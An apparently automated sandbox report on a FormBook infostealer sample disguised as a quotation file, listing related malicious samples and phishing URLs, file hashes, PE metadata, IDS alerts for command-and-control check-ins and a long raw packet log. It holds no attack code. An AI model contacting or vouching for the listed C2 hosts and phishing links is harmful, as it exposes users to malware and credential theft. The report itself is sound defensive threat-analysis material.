                                        • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, 4.8.2.0.0.0.0.0.0.0.0.0.0.0.0.0.2.0.0.0.2.0.c.0.0.3.0.1.3.0.6.2.ip6.arpa, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                        Time | Type | Description
                                        02:41:02 | API Interceptor | 1x Sleep call for process: Quotation-27-08-24.exe modified
                                        02:42:14 | API Interceptor | 10538065x Sleep call for process: PING.EXE modified
                                        Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                        • 157.7.164.178
                                        ExeFile (285).exeGet hashmaliciousEmotetBrowse
                                        • 157.7.164.178
                                        NEXINTO-DE031215-Revised-01.exeGet hashmaliciousFormBookBrowse
                                        • 194.233.65.154
                                        Copy of 01. Bill of Material - 705.exeGet hashmaliciousFormBookBrowse
                                        • 194.233.65.154
                                        RCZ-PI-4057.exeGet hashmaliciousFormBookBrowse
                                        • 194.233.65.154
                                        APS-0240226.exeGet hashmaliciousFormBookBrowse
                                        • 194.233.65.154
                                        Shipping document_pdf.exeGet hashmaliciousFormBookBrowse
                                        • 194.233.65.154
                                        arm.elfGet hashmaliciousMiraiBrowse
                                        • 212.229.153.86
                                        77.90.35.9-skid.arm-2024-07-30T07_10_51.elfGet hashmaliciousMirai, MoobotBrowse
                                        • 212.229.18.16
                                        TNT Express Arrival Notice AWB 8013580 1182023_PDF_.exeGet hashmaliciousFormBookBrowse
                                        • 194.195.220.41
                                        rf4LFk7Nvv.elfGet hashmaliciousMiraiBrowse
                                        • 194.195.1.127
                                        WIwTo1UTMq.elfGet hashmaliciousMiraiBrowse
                                        • 195.180.12.62
                                        UNIFIEDLAYER-AS-1USElectronic_Receipt_ATT0001.htmGet hashmaliciousUnknownBrowse
                                        • 69.49.245.172
                                        https://tjh.kyx.mybluehost.me/wise/number-account-184049/pages/login.phpGet hashmaliciousUnknownBrowse
                                        • 162.241.30.80
                                        Electronic_Receipt_ATT0001.htmGet hashmaliciousUnknownBrowse
                                        • 69.49.245.172
                                        https://service.clearservice.com/constructionns/track/link.jsp?id1=7962783&id2=1118626513&link=https://watercolorjourney.net/afew/ribs.htmlGet hashmaliciousUnknownBrowse
                                        • 162.241.87.113
                                        https://subwaypay.brgsistemas.com.br/ogk2/Magenta/Get hashmaliciousPhisherBrowse
                                        • 192.185.210.56
                                        QUOTATION_AUGQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 198.57.247.184
                                        DHL AWB TRACKING DETAILS.exeGet hashmaliciousFormBookBrowse
                                        • 198.57.245.28
                                        http://christianetresca.com.br/christiamewetransee/wetransffeeee-sslh0409-red-rectfy/download-files.html?email=s..*@p.......*.comGet hashmaliciousUnknownBrowse
                                        • 192.185.215.85
                                        OneDriveInvoice73391.pdfGet hashmaliciousUnknownBrowse
                                        • 162.241.114.35
                                        SecuriteInfo.com.BackDoor.SpyBotNET.75.13901.13013.exeGet hashmaliciousAgentTeslaBrowse
                                        • 192.185.13.234
                                        AMAZON-02USPayment Details Swift copy.exeGet hashmaliciousFormBookBrowse
                                        • 76.223.67.189
                                        INVG0088 LHV3495264 BL327291535V.exeGet hashmaliciousFormBookBrowse
                                        • 13.248.169.48
                                        #U5831#U50f9#U8acb#U6c42 - #U6a23#U672c#U76ee#U9304.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                        • 76.223.54.146
                                        LinhasSumarizadas_2022067095.ppamGet hashmaliciousRevengeRATBrowse
                                        • 18.228.165.84
                                        OmnibeesReservas_2022067095.ppamGet hashmaliciousRevengeRATBrowse
                                        • 18.228.165.84
                                        https://messaging-security.comano.us/XdEtiQ3I4emJ5ZldQUWF3SmcwOEQ4cURsb24rSWYyY2loVzV5bktYMlpLSlVxalNnL1RabENaQmozTzkvS3FhK1Z5ZTJDZHlNa1VGbnJDL1g3ZHBLdXdYNUJJbXVhckp5RmFuam41SWhoR0tQUTVWSmNSeEdVdXp3ZmV3eksreWs4dlFnVTBqZG8xUDdFZU9sN1JGZUNtUGdHQnZsVVJLRHREbFNUQm54UWtMa3dmdFNwVENxQTRLaFh3PT0tLUd4TXFReTErSUVBOTZZdDQtLWFZbmE1c254RWIwVWNyTkhyVHN0TUE9PQ==?cid=2140479915Get hashmaliciousUnknownBrowse
                                        • 52.217.205.32
                                        LinhasSumarizadas_2022067095.ppamGet hashmaliciousRevengeRATBrowse
                                        • 18.228.165.84
                                        http://constructivesoftware.com.auGet hashmaliciousUnknownBrowse
                                        • 13.35.58.117
                                        SALARY OF AUG 2024.exeGet hashmaliciousFormBookBrowse
                                        • 13.248.243.5
                                        https://buy-korea-online-f85b.vercel.app/?web=seunghun.lee@hdel.co.krGet hashmaliciousUnknownBrowse
                                        • 76.76.21.93
                                        No context
                                        No context
                                        Process:C:\Users\user\Desktop\Quotation-27-08-24.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):1216
                                        Entropy (8bit):5.34331486778365
                                        Encrypted:false
                                        SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                        MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                        SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                        SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                        SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                        Malicious:true
                                        Reputation:high, very likely benign file
                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                        Process:C:\Windows\SysWOW64\PING.EXE
                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                        Category:dropped
                                        Size (bytes):196608
                                        Entropy (8bit):1.1239949490932863
                                        Encrypted:false
                                        SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                        MD5:271D5F995996735B01672CF227C81C17
                                        SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                        SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                        SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                        Malicious:false
                                        Reputation:high, very likely benign file
                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Entropy (8bit):7.758373728867409
                                        TrID:
                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                        • DOS Executable Generic (2002/1) 0.01%
                                        File name:Quotation-27-08-24.exe
                                        File size:833'536 bytes
                                        MD5:fcb6844bca1d8d2a4c41025b08a50799
                                        SHA1:524dd948b1f08b4f64da958439e7c0e42b542c72
                                        SHA256:866dc796d2727a535d138d80a3196c82dfefb4c38ac6b51f8c81ca381e035f45
                                        SHA512:845481d033ee5db7ba52996b55e3a42d0982e72abbb0121172fd47de015a99821ca69b8c08c4e552857bc62103f6fe9037ae555dece5a12a0cbfc99147d9b481
                                        SSDEEP:24576:QgGHejBt2aAX1RZDyM1EpBiq3df/WQvxt3:A+1t2TX1Rh23N7vT
                                        TLSH:A905E1D43721735ECD62C831DA68EC7196A01C7AB206B6E394DB374B794C5A2DF08F92
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f..............0.............~.... ........@.. ....................... ............@................................
                                        Icon Hash:939393939393b3b3
                                        Entrypoint:0x4cc57e
                                        Entrypoint Section:.text
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                        Time Stamp:0x66CD0DE0 [Mon Aug 26 23:21:04 2024 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:4
                                        OS Version Minor:0
                                        File Version Major:4
                                        File Version Minor:0
                                        Subsystem Version Major:4
                                        Subsystem Version Minor:0
                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                        Instruction
                                        jmp dword ptr [00402000h]
                                        Name | Virtual Address | Virtual Size | Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_IMPORT | 0xcc52c | 0x4f | .text
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xce000 | 0xcb8 | .rsrc
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xd0000 | 0xc | .reloc
                                        IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                        IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                        Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                        .text | 0x2000 | 0xca584 | 0xca600 | 62ea09d63fa62655e2417f80680c7bdf | False | 0.8861034975293391 | data | 7.7665587747016405 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                        .rsrc | 0xce000 | 0xcb8 | 0xe00 | b173a1f92a95db4a1e4eb7f449616600 | False | 0.41685267857142855 | data | 4.983802667841656 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .reloc | 0xd0000 | 0xc | 0x200 | 38a8cab0025043f008a9d55ddf74120e | False | 0.044921875 | data | 0.09800417566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                        Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                        RT_ICON | 0xce0e8 | 0x83a | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.49002849002849
                                        RT_GROUP_ICON | 0xce924 | 0x14 | data | | | 1.05
                                        RT_VERSION | 0xce938 | 0x380 | data | | | 0.42299107142857145
                                        DLL | Import
                                        mscoree.dll | _CorExeMain
                                        TimestampProtocolSIDSignatureSeveritySource PortDest PortSource IPDest IP
                                        2024-08-27T08:44:59.821052+0200TCP2855465ETPRO MALWARE FormBook CnC Checkin (GET) M215125080192.168.2.6162.240.81.18
                                        2024-08-27T08:42:43.687957+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M515120880192.168.2.6119.28.49.194
                                        2024-08-27T08:42:43.687957+0200TCP2855465ETPRO MALWARE FormBook CnC Checkin (GET) M215120880192.168.2.6119.28.49.194
                                        2024-08-27T08:43:16.913156+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M315121880192.168.2.6194.195.220.41
                                        2024-08-27T08:44:43.481585+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M315124580192.168.2.6157.7.44.213
                                        2024-08-27T08:42:38.569834+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M315120680192.168.2.6119.28.49.194
                                        2024-08-27T08:43:22.022426+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M315122080192.168.2.6194.195.220.41
                                        Aug 27, 2024 08:43:30.551222086 CEST8051222172.96.186.147192.168.2.6
                                        Aug 27, 2024 08:43:30.551234007 CEST8051222172.96.186.147192.168.2.6
                                        Aug 27, 2024 08:43:30.551246881 CEST8051222172.96.186.147192.168.2.6
                                        Aug 27, 2024 08:43:30.551259041 CEST8051222172.96.186.147192.168.2.6
                                        Aug 27, 2024 08:43:30.551259995 CEST5122280192.168.2.6172.96.186.147
                                        Aug 27, 2024 08:43:30.551273108 CEST8051222172.96.186.147192.168.2.6
                                        Aug 27, 2024 08:43:30.551286936 CEST8051222172.96.186.147192.168.2.6
                                        Aug 27, 2024 08:43:30.551295996 CEST5122280192.168.2.6172.96.186.147
                                        Aug 27, 2024 08:43:30.551317930 CEST5122280192.168.2.6172.96.186.147
                                        Aug 27, 2024 08:43:30.551341057 CEST5122280192.168.2.6172.96.186.147
                                        Aug 27, 2024 08:43:30.556143999 CEST8051222172.96.186.147192.168.2.6
                                        Aug 27, 2024 08:43:30.556210041 CEST8051222172.96.186.147192.168.2.6
                                        Aug 27, 2024 08:43:30.556252003 CEST5122280192.168.2.6172.96.186.147
                                        Aug 27, 2024 08:43:31.405500889 CEST5122280192.168.2.6172.96.186.147
                                        Aug 27, 2024 08:43:32.425009012 CEST5122380192.168.2.6172.96.186.147
                                        Aug 27, 2024 08:43:32.430136919 CEST8051223172.96.186.147192.168.2.6
                                        Aug 27, 2024 08:43:32.430226088 CEST5122380192.168.2.6172.96.186.147
                                        Aug 27, 2024 08:43:32.443896055 CEST5122380192.168.2.6172.96.186.147
                                        Aug 27, 2024 08:43:32.448775053 CEST8051223172.96.186.147192.168.2.6
                                        Aug 27, 2024 08:43:33.118436098 CEST8051223172.96.186.147192.168.2.6
                                        Aug 27, 2024 08:43:33.118458033 CEST8051223172.96.186.147192.168.2.6
                                        Aug 27, 2024 08:43:33.118477106 CEST8051223172.96.186.147192.168.2.6
                                        Aug 27, 2024 08:43:33.118489981 CEST8051223172.96.186.147192.168.2.6
                                        Aug 27, 2024 08:43:33.118503094 CEST8051223172.96.186.147192.168.2.6
                                        Aug 27, 2024 08:43:33.118516922 CEST8051223172.96.186.147192.168.2.6
                                        Aug 27, 2024 08:43:33.118521929 CEST5122380192.168.2.6172.96.186.147
                                        Aug 27, 2024 08:43:33.118530035 CEST8051223172.96.186.147192.168.2.6
                                        Aug 27, 2024 08:43:33.118545055 CEST8051223172.96.186.147192.168.2.6
                                        Aug 27, 2024 08:43:33.118556976 CEST8051223172.96.186.147192.168.2.6
                                        Aug 27, 2024 08:43:33.118571997 CEST8051223172.96.186.147192.168.2.6
                                        Aug 27, 2024 08:43:33.118571043 CEST5122380192.168.2.6172.96.186.147
                                        Aug 27, 2024 08:43:33.118571043 CEST5122380192.168.2.6172.96.186.147
                                        Aug 27, 2024 08:43:33.118590117 CEST5122380192.168.2.6172.96.186.147
                                        Aug 27, 2024 08:43:33.118642092 CEST5122380192.168.2.6172.96.186.147
                                        Aug 27, 2024 08:43:33.123440027 CEST8051223172.96.186.147192.168.2.6
                                        Aug 27, 2024 08:43:33.123452902 CEST8051223172.96.186.147192.168.2.6
                                        Aug 27, 2024 08:43:33.123512983 CEST5122380192.168.2.6172.96.186.147
                                        Aug 27, 2024 08:43:33.953484058 CEST5122380192.168.2.6172.96.186.147
                                        Aug 27, 2024 08:43:34.971230030 CEST5122480192.168.2.6172.96.186.147
                                        Aug 27, 2024 08:43:34.976145983 CEST8051224172.96.186.147192.168.2.6
                                        Aug 27, 2024 08:43:34.976243973 CEST5122480192.168.2.6172.96.186.147
                                        Aug 27, 2024 08:43:34.988114119 CEST5122480192.168.2.6172.96.186.147
                                        Aug 27, 2024 08:43:34.993117094 CEST8051224172.96.186.147192.168.2.6
                                        Aug 27, 2024 08:43:34.993129969 CEST8051224172.96.186.147192.168.2.6
                                        Aug 27, 2024 08:43:35.762628078 CEST8051224172.96.186.147192.168.2.6
                                        Aug 27, 2024 08:43:35.762651920 CEST8051224172.96.186.147192.168.2.6
                                        Aug 27, 2024 08:43:35.762665033 CEST8051224172.96.186.147192.168.2.6
                                        Aug 27, 2024 08:43:35.762676954 CEST8051224172.96.186.147192.168.2.6
                                        Aug 27, 2024 08:43:35.762691021 CEST8051224172.96.186.147192.168.2.6
                                        Aug 27, 2024 08:43:35.762703896 CEST8051224172.96.186.147192.168.2.6
                                        Aug 27, 2024 08:43:35.762715101 CEST8051224172.96.186.147192.168.2.6
                                        Aug 27, 2024 08:43:35.762727022 CEST8051224172.96.186.147192.168.2.6
                                        Aug 27, 2024 08:43:35.762741089 CEST8051224172.96.186.147192.168.2.6
                                        Aug 27, 2024 08:43:35.762753963 CEST8051224172.96.186.147192.168.2.6
                                        Aug 27, 2024 08:43:35.764513969 CEST5122480192.168.2.6172.96.186.147
                                        Aug 27, 2024 08:43:35.764513969 CEST5122480192.168.2.6172.96.186.147
                                        Aug 27, 2024 08:43:35.769493103 CEST8051224172.96.186.147192.168.2.6
                                        Aug 27, 2024 08:43:35.769507885 CEST8051224172.96.186.147192.168.2.6
                                        Aug 27, 2024 08:43:35.769520998 CEST8051224172.96.186.147192.168.2.6
                                        Aug 27, 2024 08:43:35.770241022 CEST5122480192.168.2.6172.96.186.147
                                        Aug 27, 2024 08:43:35.770241022 CEST5122480192.168.2.6172.96.186.147
                                        Aug 27, 2024 08:43:36.499103069 CEST5122480192.168.2.6172.96.186.147
                                        Aug 27, 2024 08:43:37.521502018 CEST5122580192.168.2.6172.96.186.147
                                        Aug 27, 2024 08:43:37.526391983 CEST8051225172.96.186.147192.168.2.6
                                        Aug 27, 2024 08:43:37.527328968 CEST5122580192.168.2.6172.96.186.147
                                        Aug 27, 2024 08:43:37.534739017 CEST5122580192.168.2.6172.96.186.147
                                        Aug 27, 2024 08:43:37.539720058 CEST8051225172.96.186.147192.168.2.6
                                        Aug 27, 2024 08:43:38.192948103 CEST8051225172.96.186.147192.168.2.6
                                        Aug 27, 2024 08:43:38.193301916 CEST8051225172.96.186.147192.168.2.6
                                        Aug 27, 2024 08:43:38.193353891 CEST5122580192.168.2.6172.96.186.147
                                        Aug 27, 2024 08:43:38.196149111 CEST5122580192.168.2.6172.96.186.147
                                        Aug 27, 2024 08:43:38.200934887 CEST8051225172.96.186.147192.168.2.6
                                        Aug 27, 2024 08:43:43.426985979 CEST5122680192.168.2.6162.0.239.141
                                        Aug 27, 2024 08:43:43.433542013 CEST8051226162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:43.437700987 CEST5122680192.168.2.6162.0.239.141
                                        Aug 27, 2024 08:43:43.448261976 CEST5122680192.168.2.6162.0.239.141
                                        Aug 27, 2024 08:43:43.453192949 CEST8051226162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:44.030395031 CEST8051226162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:44.030441046 CEST8051226162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:44.030457020 CEST8051226162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:44.030468941 CEST8051226162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:44.030484915 CEST8051226162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:44.030498981 CEST8051226162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:44.030510902 CEST8051226162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:44.030519009 CEST8051226162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:44.030522108 CEST5122680192.168.2.6162.0.239.141
                                        Aug 27, 2024 08:43:44.030565977 CEST5122680192.168.2.6162.0.239.141
                                        Aug 27, 2024 08:43:44.030565977 CEST5122680192.168.2.6162.0.239.141
                                        Aug 27, 2024 08:43:44.036318064 CEST8051226162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:44.036379099 CEST8051226162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:44.036401033 CEST8051226162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:44.036416054 CEST8051226162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:44.036427975 CEST8051226162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:44.036463022 CEST5122680192.168.2.6162.0.239.141
                                        Aug 27, 2024 08:43:44.077183962 CEST5122680192.168.2.6162.0.239.141
                                        Aug 27, 2024 08:43:44.118832111 CEST8051226162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:44.118850946 CEST8051226162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:44.118885994 CEST8051226162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:44.118968010 CEST5122680192.168.2.6162.0.239.141
                                        Aug 27, 2024 08:43:44.119224072 CEST8051226162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:44.119364977 CEST5122680192.168.2.6162.0.239.141
                                        Aug 27, 2024 08:43:44.952374935 CEST5122680192.168.2.6162.0.239.141
                                        Aug 27, 2024 08:43:45.971091032 CEST5122780192.168.2.6162.0.239.141
                                        Aug 27, 2024 08:43:45.975912094 CEST8051227162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:45.976027012 CEST5122780192.168.2.6162.0.239.141
                                        Aug 27, 2024 08:43:45.987236977 CEST5122780192.168.2.6162.0.239.141
                                        Aug 27, 2024 08:43:45.992156982 CEST8051227162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:46.567090034 CEST8051227162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:46.567107916 CEST8051227162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:46.567143917 CEST8051227162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:46.567163944 CEST8051227162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:46.567177057 CEST8051227162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:46.567181110 CEST5122780192.168.2.6162.0.239.141
                                        Aug 27, 2024 08:43:46.567188978 CEST8051227162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:46.567203045 CEST8051227162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:46.567215919 CEST8051227162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:46.567228079 CEST5122780192.168.2.6162.0.239.141
                                        Aug 27, 2024 08:43:46.567233086 CEST8051227162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:46.567243099 CEST8051227162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:46.567261934 CEST5122780192.168.2.6162.0.239.141
                                        Aug 27, 2024 08:43:46.567282915 CEST5122780192.168.2.6162.0.239.141
                                        Aug 27, 2024 08:43:46.572103024 CEST8051227162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:46.572115898 CEST8051227162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:46.572129965 CEST8051227162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:46.572143078 CEST8051227162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:46.572161913 CEST5122780192.168.2.6162.0.239.141
                                        Aug 27, 2024 08:43:46.572200060 CEST5122780192.168.2.6162.0.239.141
                                        Aug 27, 2024 08:43:46.653692961 CEST8051227162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:46.653721094 CEST8051227162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:46.653736115 CEST8051227162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:46.653780937 CEST8051227162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:46.653780937 CEST5122780192.168.2.6162.0.239.141
                                        Aug 27, 2024 08:43:46.653836012 CEST5122780192.168.2.6162.0.239.141
                                        Aug 27, 2024 08:43:47.499074936 CEST5122780192.168.2.6162.0.239.141
                                        Aug 27, 2024 08:43:48.518515110 CEST5122880192.168.2.6162.0.239.141
                                        Aug 27, 2024 08:43:48.523443937 CEST8051228162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:48.523523092 CEST5122880192.168.2.6162.0.239.141
                                        Aug 27, 2024 08:43:48.539870024 CEST5122880192.168.2.6162.0.239.141
                                        Aug 27, 2024 08:43:48.544831991 CEST8051228162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:48.544842958 CEST8051228162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:49.164372921 CEST8051228162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:49.164386034 CEST8051228162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:49.164406061 CEST8051228162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:49.164423943 CEST8051228162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:49.164437056 CEST8051228162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:49.164447069 CEST5122880192.168.2.6162.0.239.141
                                        Aug 27, 2024 08:43:49.164449930 CEST8051228162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:49.164463043 CEST8051228162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:49.164474964 CEST8051228162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:49.164496899 CEST8051228162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:49.164499998 CEST5122880192.168.2.6162.0.239.141
                                        Aug 27, 2024 08:43:49.164511919 CEST8051228162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:49.164535046 CEST5122880192.168.2.6162.0.239.141
                                        Aug 27, 2024 08:43:49.164556980 CEST5122880192.168.2.6162.0.239.141
                                        Aug 27, 2024 08:43:49.169431925 CEST8051228162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:49.169524908 CEST8051228162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:49.169537067 CEST8051228162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:49.169590950 CEST8051228162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:49.169698000 CEST8051228162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:49.175542116 CEST5122880192.168.2.6162.0.239.141
                                        Aug 27, 2024 08:43:49.251149893 CEST8051228162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:49.251166105 CEST8051228162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:49.251190901 CEST8051228162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:49.251235962 CEST8051228162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:49.251384974 CEST5122880192.168.2.6162.0.239.141
                                        Aug 27, 2024 08:43:49.251384974 CEST5122880192.168.2.6162.0.239.141
                                        Aug 27, 2024 08:43:49.251445055 CEST8051228162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:49.251923084 CEST5122880192.168.2.6162.0.239.141
                                        Aug 27, 2024 08:43:50.049518108 CEST5122880192.168.2.6162.0.239.141
                                        Aug 27, 2024 08:43:51.064801931 CEST5122980192.168.2.6162.0.239.141
                                        Aug 27, 2024 08:43:51.069737911 CEST8051229162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:51.069852114 CEST5122980192.168.2.6162.0.239.141
                                        Aug 27, 2024 08:43:51.077570915 CEST5122980192.168.2.6162.0.239.141
                                        Aug 27, 2024 08:43:51.082361937 CEST8051229162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:51.707773924 CEST8051229162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:51.707797050 CEST8051229162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:51.707809925 CEST8051229162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:51.707822084 CEST8051229162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:51.707838058 CEST8051229162.0.239.141192.168.2.6
                                        Aug 27, 2024 08:43:51.707850933 CEST8051229162.0.239.141192.168.2.6
